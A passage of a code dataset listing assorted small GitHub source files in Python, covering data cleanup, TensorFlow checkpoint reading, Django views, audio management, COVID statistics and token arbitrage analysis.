mode.\")\n\t\tconfig_class = DevConfig\n\telse:\n\t\texit(\"Invalid argument.\")\nelse:\n\tprint(\"Running in development mode 
(default).\")\nconfig = vars(config_class)\nset_config(config)\n\ninit_db_connection()\nfor file in os.listdir(config[\"TASK_RESULT_PATH\"]):\n\t# Only look at actual task result files.\n\tif len(file) != 36:\n\t\t\tcontinue\n\tjob_entry = get_job_entry(file)\n\tif job_entry is None:\n\t\tos.remove(config[\"TASK_RESULT_PATH\"] + file)\n","repo_name":"JackNeus/bookish-waddle","sub_path":"clean_results.py","file_name":"clean_results.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17232576759","text":"'''\nExplanation of Approach:\n1. We start by initializing the `largest` variable to negative infinity (`float('-inf')`) to make sure that any element in the matrix will be greater than this initial value.\n2. We iterate through each row of the matrix using a nested loop.\n3. Inside the nested loop, we iterate through each element in the current row and compare it with the current largest element. If the current element is greater than the current largest, we update the `largest` variable.\n4. After iterating through all the elements in the matrix, the `largest` variable will hold the largest element.\n\nSample Input:\n3 7 1\n8 5 2\n9 4 6\n\nSample Output:\nThe largest element in the matrix is: 9\n\nTime Complexity: The time complexity of this program is O(m * n), where m is the number of rows and n is the number of columns in the matrix.\n\nSpace Complexity: The space complexity is O(1) as we are using a constant amount of extra space regardless of the input size.\n'''\n\ndef find_largest_element(matrix):\n # Initialize the variable to store the largest element\n largest = float('-inf')\n \n # Iterate through each row in the matrix\n for row in matrix:\n # Iterate through each element in the current row\n for element in row:\n # Compare the current element with the largest element found so far\n if element > largest:\n largest = element\n \n return largest\n\n# Sample input matrix\nsample_matrix = [\n [3, 7, 1],\n [8, 5, 2],\n [9, 4, 6]\n]\n\n# Call the function to find the largest element\nresult = find_largest_element(sample_matrix)\n\n# Print the result\nprint(\"The largest element in the matrix is:\", result)\n\n","repo_name":"avantikachauhann/Algorithm-Alchemy","sub_path":"Python/2D-Arrays/LargestElementIn2DArray.py","file_name":"LargestElementIn2DArray.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"38816536886","text":"from pathlib import Path\n\nimport hiyapyco\n\n\nclass YamlCallback:\n def __init__(self, target_path):\n self.target_path = Path(target_path)\n\n def render(self, data, sub_dir_origin, sub_dir_target):\n sub_dir_origin = Path(sub_dir_origin)\n if sub_dir_origin.suffix not in [\".yaml\", \".yml\"]:\n return data\n\n target_path = self.target_path.joinpath(sub_dir_target)\n if not target_path.exists():\n return data\n\n target_data = target_path.read_text()\n if len(data) == 0:\n return target_data\n\n if len(target_data) == 0:\n return data\n\n merged_yaml = hiyapyco.load(\n [target_data, data], method=hiyapyco.METHOD_MERGE)\n return 
str(hiyapyco.dump(merged_yaml))\n","repo_name":"zuplucas/catalog-orange-test","sub_path":"template-engine/run-template/src/framework/templateframework/render/yaml_callback.py","file_name":"yaml_callback.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7454953842","text":"import os\r\nfrom tensorflow.python import pywrap_tensorflow\r\n'''\r\nimport tensorflow as tf\r\nsaver=tf.train.import_meta_graph('./tmp/train_model.ckpt.meta')\r\ngraph=tf.get_default_graph()\r\na_val=graph.get_tensor_by_name()\r\n'''\r\n'''\r\nimport os\r\nimport re\r\nimport tensorflow as tf\r\nfrom tensorflow.python import pywrap_tensorflow\r\n\r\nmodel_exp = \"20180402-114759\"\r\ndef get_model_filenames(model_dir):\r\n files = os.listdir(model_dir)\r\n meta_files = [s for s in files if s.endswith('.meta')]\r\n if len(meta_files) == 0:\r\n raise ValueError('No meta file found in the model directory (%s)' % model_dir)\r\n elif len(meta_files) > 1:\r\n raise ValueError('There should not be more than one meta file in the model directory (%s)' % model_dir)\r\n meta_file = meta_files[0]\r\n ckpt = tf.train.get_checkpoint_state(model_dir) # 通过checkpoint文件找到模型文件名\r\n if ckpt and ckpt.model_checkpoint_path:\r\n # ckpt.model_checkpoint_path表示模型存储的位置,不需要提供模型的名字,它回去查看checkpoint文件\r\n ckpt_file = os.path.basename(ckpt.model_checkpoint_path)\r\n return meta_file, ckpt_file\r\n\r\n meta_files = [s for s in files if '.ckpt' in s]\r\n max_step = -1\r\n for f in files:\r\n step_str = re.match(r'(^model-[\\w\\- ]+.ckpt-(\\d+))', f)\r\n if step_str is not None and len(step_str.groups()) >= 2:\r\n step = int(step_str.groups()[1])\r\n if step > max_step:\r\n max_step = step\r\n ckpt_file = step_str.groups()[0]\r\n return meta_file, ckpt_file\r\n\r\n\r\nmeta_file, ckpt_file = get_model_filenames(model_exp)\r\n\r\nprint('Metagraph file: %s' % meta_file)\r\nprint('Checkpoint file: %s' % ckpt_file)\r\nreader = pywrap_tensorflow.NewCheckpointReader(os.path.join(model_exp, ckpt_file))\r\nvar_to_shape_map = reader.get_variable_to_shape_map()\r\nfor key in var_to_shape_map:\r\n print(\"tensor_name: \", key)\r\n # print(reader.get_tensor(key))\r\n\r\nwith tf.Session() as sess:\r\n saver = tf.train.import_meta_graph(os.path.join(model_exp, meta_file))\r\n saver.restore(tf.get_default_session(),\r\n os.path.join(model_exp, ckpt_file))\r\n print(tf.get_default_graph().get_tensor_by_name(\"Logits/weights:0\"))\r\n '''\r\n\r\n\r\n\r\n# 使用NewCheckpointReader来读取ckpt里的变量\r\nfrom tensorflow.python import pywrap_tensorflow\r\n\r\ncheckpoint_path = './tmp/train_model.ckpt'\r\nreader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path) # tf.train.NewCheckpointReader\r\nvar_to_shape_map = reader.get_variable_to_shape_map()\r\nvar_to_shape_map=sorted(var_to_shape_map)\r\nfor i ,key in enumerate(var_to_shape_map):\r\n print(\"tensor_name: \", key)\r\n print(reader.get_tensor(key))\r\n\r\n# 使用print_tensors_in_checkpoint_file打印ckpt里的内容\r\n'''\r\nfrom tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file\r\n\r\nprint_tensors_in_checkpoint_file('./tmp/train_model.ckpt.data-00000-of-00001', # ckpt文件名字\r\n None, # 如果为None,则默认为ckpt里的所有变量\r\n True, # bool 是否打印所有的tensor,这里打印出的是tensor的值,一般不推荐这里设置为False\r\n True) # bool 是否打印所有的tensor的name\r\n# 
The ckpt printing above internally uses pywrap_tensorflow.NewCheckpointReader, so mastering NewCheckpointReader is what really matters\r\n'''","repo_name":"Buster-maker/classify","sub_path":"read_ckpt.py","file_name":"read_ckpt.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13359732651","text":"#Create a program that asks the user to enter their name and their age. \n#Print out a message addressed to them that tells them the year that they \n#will turn 100 years old.\n#Extras:\n#Add on to the previous program by asking the user for another number and \n#printing out that many copies of the previous message. (Hint: order of \n#operations exists in Python)\n#Print out that many copies of the previous message on separate lines. (Hint: the string \"\\n is the same as pressing the ENTER button)\n\nfrom datetime import date\n\nage = int(input(\"What is your age?\"))\nname = input(\"What is your name?\")\nprint_count = int(input(\"Print output count?\"))\n\nyear_to_add = 100-age\n\ncurrent_year = date.today().year\n\noutput_year = current_year + year_to_add\n\nfor index in range(print_count):\n\tprint(\"Hi \"+name +\" you will be 100 in \"+ str(output_year)+\"\\n\")","repo_name":"adambatchelor2/python","sub_path":"PracticePython_1_YearsAdd.py","file_name":"PracticePython_1_YearsAdd.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25692209718","text":"import pygame\n\nfrom vroom.resource_manager import ResourceManager\n\n\nclass AudioManager:\n    totalChannels: int = 0\n    categories: dict[str, list[pygame.mixer.Channel]] = {}\n\n    @staticmethod\n    def Init():\n        \"\"\"\n        The Init function initializes the pygame mixer module.\n        It should be called once before any channels are allocated or sounds are played.\n\n        :return: None\n        :doc-author: Trelent\n        \"\"\"\n        pygame.mixer.pre_init(channels=AudioManager.totalChannels)\n        pygame.mixer.init()\n\n    @staticmethod\n    def AddCategory(name: str, numOfChannels: int):\n        \"\"\"\n        The AddCategory function adds a new category of channels to the AudioManager.\n        The name parameter is used as the key for accessing this category in the future.\n        The numOfChannels parameter specifies how many channels should be allocated to this category.\n\n        :param name: str: Identify the category\n        :param numOfChannels: int: Determine how many channels are allocated to the category\n        :return: None\n        :doc-author: Trelent\n        \"\"\"\n        allocatedChannels: int = AudioManager.totalChannels\n        AudioManager.totalChannels += numOfChannels\n        pygame.mixer.set_num_channels(AudioManager.totalChannels)\n\n        channels: list[pygame.mixer.Channel] = []\n        for x in range(numOfChannels):\n            channels.append(pygame.mixer.Channel(allocatedChannels))\n            allocatedChannels += 1\n        AudioManager.categories[name] = channels\n\n    @staticmethod\n    def PlaySound(categoryName: str, soundName: str) -> None:\n        \"\"\"\n        The PlaySound function takes in a category name and sound name,\n        and plays the sound on an available channel. 
If no channels are available,\n it prints out an error message.\n\n :param categoryName: str: Specify which category of audio channels the sound should be played on\n :param soundName: str: Get the sound from the resourcemanager\n :return: None\n :doc-author: Trelent\n \"\"\"\n sound: pygame.mixer.Sound = ResourceManager.getSound(soundName)\n\n if categoryName not in AudioManager.categories.keys():\n print(f\"ERROR: Category {categoryName} not found\")\n return\n\n playedAudio: bool = False\n\n for channel in AudioManager.categories[categoryName]:\n if not channel.get_busy():\n channel.play(sound)\n playedAudio = True\n break\n\n if not playedAudio:\n print(f\"All channels in category {categoryName} used up\")\n","repo_name":"lwalton101/VroomVroom","sub_path":"vroom/AudioManager.py","file_name":"AudioManager.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72398641707","text":"from TensorNAS.Core.Block import Block\nfrom enum import Enum, auto\n\n\nclass Block(Block):\n \"\"\"\n Layers that can be used in the extraction of features\n \"\"\"\n\n # TODO the input to the layer must be divisible by 4. Maybe some thought should be put\n # into making this more robust and removing the placeholder input conv2d block.\n\n MAX_SUB_BLOCKS = 0\n\n class SubBlocks(Enum):\n DEPTHWISECONV2D = auto()\n POINTWISECONV2D = auto()\n GROUPEDCONV2D = auto()\n\n def generate_constrained_input_sub_blocks(self, input_shape):\n from TensorNAS.Layers.Conv2D.Conv2D import Layer as Conv2D\n from TensorNAS.Core.Layer import ArgPadding\n from TensorNAS.Layers.Conv2D import Args as conv_args\n\n return [\n Conv2D(\n input_shape=input_shape,\n parent_block=self,\n args={conv_args.FILTERS: 16, conv_args.PADDING: ArgPadding.SAME},\n )\n ]\n\n def generate_sub_block(self, input_shape, layer_type):\n from TensorNAS.Layers.Conv2D.DepthwiseConv2D import Layer as DepthwiseConv2D\n from TensorNAS.Layers.Conv2D.PointwiseConv2D import Layer as PointwiseConv2D\n from TensorNAS.Layers.Conv2D.GroupedPointwiseConv2D import (\n Layer as GroupedPointwise2D,\n )\n\n if layer_type == self.SubBlocks.GROUPEDCONV2D:\n return [GroupedPointwise2D(input_shape=input_shape, parent_block=self)]\n elif layer_type == self.SubBlocks.POINTWISECONV2D:\n return [PointwiseConv2D(input_shape=input_shape, parent_block=self)]\n elif layer_type == self.SubBlocks.DEPTHWISECONV2D:\n return [DepthwiseConv2D(input_shape=input_shape, parent_block=self)]\n\n return []\n\n def generate_constrained_output_sub_blocks(self, input_shape):\n from TensorNAS.Layers.Conv2D.GroupedPointwiseConv2D import (\n Layer as GroupedPointwiseConv2D,\n )\n from TensorNAS.Layers.Shuffle import Layer as Shuffle\n from TensorNAS.Layers.Conv2D.DepthwiseConv2D import Layer as DepthwiseConv2D\n from TensorNAS.Core.Layer import ArgActivations, ArgPadding\n from TensorNAS.Layers.Conv2D import Args as conv_args\n\n residual_channel_depth = input_shape[-1]\n bottleneck_filters = residual_channel_depth // 4\n\n layers = []\n layers.append(\n GroupedPointwiseConv2D(\n input_shape=input_shape,\n parent_block=self,\n args={\n conv_args.FILTERS: bottleneck_filters,\n conv_args.ACTIVATION: ArgActivations.RELU,\n conv_args.PADDING: ArgPadding.SAME,\n },\n )\n )\n layers.append(\n Shuffle(\n input_shape=layers[-1].get_output_shape(),\n parent_block=self,\n )\n )\n layers.append(\n DepthwiseConv2D(\n input_shape=layers[-1].get_output_shape(),\n parent_block=self,\n args={\n conv_args.KERNEL_SIZE: 
(3, 3),\n                    conv_args.PADDING: ArgPadding.SAME,\n                },\n            )\n        )\n        layers.append(\n            GroupedPointwiseConv2D(\n                input_shape=layers[-1].get_output_shape(),\n                parent_block=self,\n                args={\n                    conv_args.FILTERS: residual_channel_depth,\n                    conv_args.ACTIVATION: ArgActivations.RELU,\n                },\n            )\n        )\n        return layers\n\n    def get_keras_layers(self, input_tensor):\n        from TensorNAS.Tools.TensorFlow import shortcut\n\n        tmp = input_tensor\n        for sb in self.input_blocks + self.middle_blocks + self.output_blocks:\n            tmp = sb.get_keras_layers(tmp)\n        return shortcut(input_tensor, tmp)\n","repo_name":"alxhoff/TensorNAS","sub_path":"Blocks/SubBlocks/ShuffleNetBlock.py","file_name":"ShuffleNetBlock.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31957260156","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('login/', views.UserLoginView.as_view(), name='login'),\n    path('signup/', views.SignupView.as_view(), name='signup'),\n    path('profile//faculty/', views.EditFacultyStaffProfileView.as_view(), name='faculty_profile'),\n    path('profile//student/', views.EditStudentProfileView.as_view(), name='student_profile'),\n    path('logout/', views.LogoutUserView.as_view(), name='logout_user'),\n\n]","repo_name":"morikeli/smart-scheduler","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25560434776","text":"n=int(input())\nfor i in range(1,n+1):\n    arr=list(map(int,list(str(i))))\n    if sum(arr)+i == n:\n        print(i)\n        break\n    if i==n:\n        print(0)\n'''\n# first draft\nn=int(input())\nfor i in range(1,n+1):\n    a,b,c = i//100,(i%100)//10,(i%100)%10\n    tmp_sum = i+a+b+c\n    if tmp_sum == n:\n        print(i)\n        break\n    if i==n:\n        print(0)\n'''\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"완전탐색/2231.분해합/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41327041097","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.http import HttpRequest\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom .models import visitor as T_Visitor\nfrom common.views import *\nfrom django.http import JsonResponse\nfrom .forms import *\nimport json\nfrom django.utils import timezone\nfrom django.forms import widgets as Fwidge\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom baseframe.baseframe import *\n# Create your views here.\n\n# Controller entry point\nclass entrance(EntranceView_base):\n    def set_view(self, request):\n        prj_id = self.request.session['PrjID']\n\n        self.template_name = 'content/visitor/visitorinfo.html'\n\n\n# Return table data and query results\nclass get_datasource(get_datasource_base):\n    def get_queryset(self, request):\n        prj_id = self.request.session['PrjID']\n        serinput = self.request.GET.get(\"resultdict[FName]\", '')\n        visitor_info = T_Visitor.objects.filter(Q(CREATED_PRJ=prj_id), Q(FName__contains=serinput))\n\n        return visitor_info\n\n\n# Link to the add template\nclass add(add_base):\n    def set_view(self, request):\n        self.template_name = 'content/visitor/visitoradd.html'\n        self.objForm = VisitorModelForm\n\n# Link to the edit template\nclass edit(edit_base):\n    def set_view(self, request):\n        self.template_name = 'content/visitor/visitoradd.html'\n        self.model = T_Visitor\n        self.objForm = VisitorModelForm\n\n\n# Handle creating and saving data\nclass 
insert(insert_base):\n    def set_view(self, request):\n        self.model = T_Visitor\n        self.objForm = VisitorModelForm\n\n\n# Handle a visitor returning their card\nclass quit(disabled_base):\n    def set_view(self, request):\n        self.type = 1\n        self.status = [1, 0]\n        self.model = T_Visitor\n\n        fid = self.request.POST.get('fid')\n        visitor_info = T_Visitor.objects.get(Q(FID=fid))\n        visitor_info.FRefundDate = timezone.now()\n        visitor_info.save()\n\n# Handle disable/enable\nclass disabled(disabled_base):\n    def set_view(self, request):\n        self.model = T_Visitor\n        self.type = 1\n        self.status = [2, 0]\n","repo_name":"wjcyxx/ISMS","sub_path":"visitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"29162761631","text":"#!/usr/bin/env python\r\n\r\nimport sys\r\nsys.path.append('..')\r\n\r\nimport os\r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tune_viz.settings')\r\n\r\nfrom argparse import ArgumentParser\r\nfrom tune_viz.models import *\r\nimport music21\r\n\r\ndef iter_bigrams(iterable):\r\n    i = iter(iterable)\r\n    prev = None\r\n    current = None\r\n\r\n    try:\r\n        while True:\r\n            prev = current\r\n            current = i.next()\r\n            yield (prev, current)\r\n    except StopIteration:\r\n        current = None  \r\n\r\n    yield (prev, current)\r\n\r\n\r\ndef update_measure(measure_text, frequencies):\r\n    m, created = Measure.objects.get_or_create(text=measure_text)\r\n    frequencies[m.id] = frequencies.setdefault(m.id, 0) + 1\r\n\r\n    return m\r\n    \r\n\r\ndef main(key, rhythm, unit_note_length, normalize):\r\n    tunes = Tune.objects.all()\r\n\r\n    # Filter based on the unit note length\r\n    if unit_note_length:\r\n        tunes = tunes.filter(unit_note_length=unit_note_length)\r\n\r\n    # Filter by key\r\n    if key:\r\n        tunes = tunes.filter(key=key)\r\n\r\n    # Filter by rhythm\r\n    if rhythm:\r\n        tunes = tunes.filter(rhythm=rhythm)\r\n\r\n    total_tunes = tunes.count()\r\n    frequencies = {}\r\n    bigrams = {}\r\n\r\n    for i, tune in enumerate(tunes):\r\n        try:\r\n            print(u'{: >7,d} / {: <7,d} {}'.format(i + 1, total_tunes, tune.title))\r\n\r\n            measure_list = map(lambda x: x.strip('|:'), tune.notation.split('|'))\r\n\r\n            for prev, current in iter_bigrams(measure_list):\r\n                measure = None\r\n                prev_measure = None\r\n                bigram_key = [None, None]\r\n\r\n                if prev and current:\r\n                    prev_measure = update_measure(prev, frequencies)\r\n                    measure = update_measure(current, frequencies)\r\n\r\n                    bigram_key[0] = prev_measure.id\r\n                    bigram_key[1] = measure.id\r\n\r\n                bigram_key = tuple(bigram_key)\r\n                bigrams[bigram_key] = bigrams.setdefault(bigram_key, 0) + 1\r\n\r\n        except:\r\n            print('Unexpected error: {}'.format(sys.exc_info()[0]))\r\n            raise\r\n\r\n    for measure_id, count in frequencies.iteritems():\r\n        m = Measure.objects.get(id=measure_id)\r\n        m.frequency = count\r\n        m.save()\r\n\r\n    for bigram_key, count in bigrams.iteritems():\r\n        measure = None\r\n        previous = None\r\n\r\n        if bigram_key[1]:\r\n            measure = Measure.objects.get(id=bigram_key[1])\r\n        if bigram_key[0]:\r\n            previous = Measure.objects.get(id=bigram_key[0])\r\n\r\n        bigram, created = MeasureBigram.objects.get_or_create(measure=measure, previous=previous)\r\n        bigram.frequency = count\r\n        bigram.save()\r\n\r\n\r\nif __name__ == '__main__':\r\n    parser = ArgumentParser('Calculate bigrams of measures for a subset of Irish tunes')\r\n    parser.add_argument('-k', '--key', default=None, type=str, dest='key')\r\n    parser.add_argument('-r', '--rhythm', default=None, type=str, dest='rhythm')\r\n    parser.add_argument('-l', '--length', default='1/8', type=str, dest='length', help='Unit note length')\r\n    parser.add_argument('--normalize', action='store_true', dest='normalize')\r\n    args = parser.parse_args()\r\n\r\n    main(args.key, args.rhythm, 
args.length, args.normalize)\n","repo_name":"darthmall/Irish-Tune-Visualization","sub_path":"py/ngrams.py","file_name":"ngrams.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37421634606","text":"import pandas as pd\r\nimport datetime\r\nimport json\r\nimport pytz\r\n\r\n# New Case Data\r\ncases_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/cases_malaysia.csv\"\r\ncol_list = [\"date\", \"cases_new\"]\r\ncases_df = pd.read_csv(cases_url, usecols=col_list)\r\ncases_today = cases_df.tail(n=1)\r\ncase_results = int(cases_today.cases_new)\r\n\r\n# Death Data\r\ndeath_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/deaths_malaysia.csv\"\r\ncol_list = [\"date\", \"deaths_new\"]\r\ndeath_df = pd.read_csv(death_url, usecols=col_list)\r\ndeath_today = death_df.tail(n=1)\r\ndeath_results = int(death_today.deaths_new)\r\n\r\n# Recovery Data\r\nrecovery_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/cases_malaysia.csv\"\r\ncol_list = [\"date\", \"cases_recovered\"]\r\nrecovery_df = pd.read_csv(recovery_url, usecols=col_list)\r\nrecovery_today = recovery_df.tail(n=1)\r\nrecovery = int(recovery_today.cases_recovered)\r\n\r\n# Extract the report date\r\ndate_dirty = str(death_today.date)[-36:]\r\ndate_current = date_dirty[:-26]\r\n\r\n# Current time of process for server to log. Malaysian time for reference\r\nKL = pytz.timezone(\"Asia/Kuala_Lumpur\")\r\ncurrent_time = str(datetime.datetime.now(KL))\r\n\r\n# Summary function\r\ndef short_summary():\r\n    summary = [\r\n        {\r\n            \"country\": \"Malaysia\",\r\n            \"last updated\": date_current,\r\n            \"cases\": case_results,\r\n            \"deaths\": death_results,\r\n            \"recovery\": recovery,\r\n            \"generated\": current_time,\r\n        }\r\n    ]\r\n    \"\"\"save data to json file\"\"\"\r\n    with open(\"data.json\", \"w\") as outfile:\r\n        json.dump(summary, outfile, indent=4, sort_keys=False)\r\n    return summary\r\n\r\n\r\n# Call function\r\nshort_summary()\r\n","repo_name":"yapkhaichuen/Daily-Covid-Report","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11695830368","text":"import pandas as pd\n\nfrom collections import defaultdict, Counter\n\nlabel_path = \"/home/senyang/EigenPhi/blockchair_erc-20_tokens_latest.tsv\"\nwith open(label_path, \"r\") as f:\n    lines = f.readlines()[1::]\n    lines = [line.strip() for line in lines]\n    lines = [line.split(\"\\t\") for line in lines]\n    address_to_symbol = dict(zip([line[1] for line in lines], [line[4] for line in lines]))\n\n# label_df = pd.read_csv(label_path, sep=\"\\t\")\n\n# address_to_symbol = dict(zip(label_df[\"address\"], label_df[\"symbol\"]))\n\narb_pathes = [\"/home/senyang/EigenPhi/arbitrage/arbitrage_all.csv\", \"/home/senyang/EigenPhi/arbitrage/arbitrage_no_volume.csv\", \"/home/senyang/EigenPhi/raw_mev/arbitrage_add.csv\"]\n\nclass TokenPair:\n    def __init__(self, token_pair):\n        self.token_pair = token_pair\n        self.count = 0\n        self.revenue = []\n        self.profit = []\n        self.cost = []\n    \n    def add(self, revenue, profit, cost):\n        self.count += 1\n        self.revenue.append(revenue)\n        self.profit.append(profit)\n        self.cost.append(cost)\n\nclass Token:\n    def __init__(self, token):\n        self.token = token\n        self.count = 0\n        self.revenue = []\n        self.profit = []\n        self.cost = []\n    \n    def add(self, revenue, 
profit, cost):\n self.count += 1\n self.revenue.append(revenue)\n self.profit.append(profit)\n self.cost.append(cost)\n\ntokens = defaultdict(lambda : Token(None))\n\nfor path in arb_pathes:\n df = pd.read_csv(path)\n columns = df.columns\n columns = [column.strip() for column in columns]\n df.columns = columns\n for token_pair, revenue, profit, cost in df[[\"tokens\", \"revenue\", \"profit\", \"cost\"]].values:\n pair = token_pair.split(\" \")\n pair_symbols = []\n \n for token_addr in pair:\n token_addr = token_addr.strip()[2::]\n if token_addr not in address_to_symbol:\n pair_symbols.append(token_addr)\n else:\n pair_symbols.append(address_to_symbol[token_addr])\n\n # pair_name = \"/\".join(pair_symbols)\n for symbol in pair_symbols:\n tokens[symbol].token = symbol\n tokens[symbol].add(revenue, profit, cost)\n\n # for token_symbol in pair_symbols:\n # tokens[token_symbol] += 1\n\ntoken_list = tokens.values()\n\n# most_profit_tokens = sorted(token_list, key=lambda x: sum(x.profit), reverse=True)\n# for pair in most_profit_tokens[:10:]:\n# print(pair.token, pair.count, sum(pair.profit))\n\n# most_profit_average_tokens = sorted(token_list, key=lambda x: sum(x.profit)/len(x.profit), reverse=True)\n# for pair in most_profit_average_tokens[:10:]:\n# print(pair.token, pair.count, sum(pair.profit)/len(pair.profit))\n\n# most_profit_max_tokens = sorted(token_list, key=lambda x: max(x.profit), reverse=True)\n# for pair in most_profit_max_tokens[:10:]:\n# print(pair.token, pair.count, max(pair.profit))\nselect_tokens = set()\n\nprint(\"most count\")\nmost_count_tokens = sorted(token_list, key=lambda x: x.count, reverse=True)\nfor pair in most_count_tokens[:20:]:\n print(pair.token, pair.count)\n select_tokens.add(pair.token)\n\nprint(\"most revenue\")\nmost_revenue_tokens = sorted(token_list, key=lambda x: sum(x.revenue), reverse=True)\nfor pair in most_revenue_tokens[:20:]:\n print(pair.token, pair.count, sum(pair.revenue))\n select_tokens.add(pair.token)\n\nprint(\"most revenue average\")\nmost_revenue_average_tokens = sorted(token_list, key=lambda x: sum(x.revenue)/len(x.revenue), reverse=True)\nfor pair in most_revenue_average_tokens[:20:]:\n print(pair.token, pair.count, sum(pair.revenue)/len(pair.revenue))\n select_tokens.add(pair.token)\n\nprint(\"most revenue max\")\nmost_revenue_max_tokens = sorted(token_list, key=lambda x: max(x.revenue), reverse=True)\nfor pair in most_revenue_max_tokens[:20:]:\n print(pair.token, pair.count, max(pair.revenue))\n select_tokens.add(pair.token)\n\nitems = []\nfor token in select_tokens:\n items.append((token, tokens[token].count, sum(tokens[token].revenue), sum(tokens[token].revenue)/len(tokens[token].revenue), max(tokens[token].revenue)))\n\ndf = pd.DataFrame(items, columns=[\"token\", \"txn count\", \"all revenue\", \"average revenue per txn\", \"max revenue in one txn\"])\ndf.sort_values(by=\"txn count\", ascending=False, inplace=True)\ndf.to_html(\"token_distribution.html\", index=False)","repo_name":"pillowsofwind/mev","sub_path":"analysis/token_distribution.py","file_name":"token_distribution.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10656769375","text":"import json\nimport sys\nimport random\nimport matplotlib\n\nresults_folder = \"/home/german/simulation/results\"\n\ndef load_json(filename):\n with open(filename) as f:\n return json.loads(f.read())\n\n\ndef save_json(value, filename):\n with open(filename, 'w') as outfile:\n 
json.dump(value, outfile)\n\nexperiments = [\"complexity_from_4.31_to_4.66\",\n \"complexity_from_4.66_to_5.0\",\n \"complexity_from_5.0_to_5.35\",\n \"complexity_from_5.35_to_5.69\",\n \"complexity_from_5.69_to_6.03\",\n \"complexity_from_6.03_to_6.38\" ]\n\nplanning_limits = [0, 100, 500, 1000, 5000, 10000, 15000, 20000, 30000, 50000, 100000, 150000, 200000, 300000, 500000]\n\nfor entropy_bucket in range(11):\n selected_worlds = set()\n for experiment in experiments:\n experiment_path = results_folder + \"/\" + experiment\n experiment_stats = load_json( experiment_path + \"/stats.json\")\n for g in experiment_stats[\"groups\"]:\n for w in g[\"worlds\"]:\n eb = round(w[\"stats\"][0][\"entropy\"] * 10)\n if eb == entropy_bucket:\n selected_worlds.update([w[\"name\"]]);\n\n new_settings = []\n for world_name in selected_worlds:\n for experiment in experiments:\n experiment_path = results_folder + \"/\" + experiment\n settings = load_json(experiment_path + \"/settings.json\")\n for setting in settings:\n if setting[\"world\"] == world_name:\n setting[\"group\"] = setting[\"group\"].replace(\"plannint_limit_\", \"\")\n new_settings += [setting]\n\n save_json(new_settings, \"entropy_bucket_\" + str(entropy_bucket) + \".json\")\n","repo_name":"germanespinosa/visualizer","sub_path":"by_entropy.py","file_name":"by_entropy.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27153423091","text":"# COMMON TOPICS\nTOPIC_S_DISCONNECT = \"common.disconnect\"\nTOPIC_D_DISCONNECT_RESPONSE = \"common.disconnect_response\"\nTOPIC_S_CONNECT = \"common.connect\"\nTOPIC_S_CONNECT_ALL = \"common.connect_all\"\nTOPIC_S_LOAD_ALL = \"common.load_all\"\nTOPIC_S_SCAN_FOR_NEW = \"scan.new\"\nTOPIC_D_SCAN_FOR_NEW_RESPONSE = \"scan.new_response\"\nTOPIC_S_ADD_DEVICE = \"add.new\"\nTOPIC_D_ADD_DEVICE_RESPONSE = \"add.new_response\"\n\n# WATER DISPENSER TOPICS\nTOPIC_S_WD_IDENTIFY = \"water_dispenser.identify\"\nTOPIC_S_WD_ON_OFF = \"water_dispenser.on_off\"\nTOPIC_S_WD_RUN = \"water_dispenser.run\"\n\n# SOIL SENSOR TOPICS\nTOPIC_S_SM_CALIBRATE = \"soil_sensor.calibrate\"\nTOPIC_S_SM_SOIL_MEASURE = \"soil_sensor.soil_measure\"\nTOPIC_D_SM_SOIL_MEASURE_RESPONSE = \"soil_sensor.soil_measure_response\"\nTOPIC_S_SM_TIME_INTERVAL = \"soil_sensor.time_interval\"\nTOPIC_S_SM_R_BATTERY = \"soil_sensor.read_battery\"\nTOPIC_D_SM_R_BATTERY_RESPONSE = 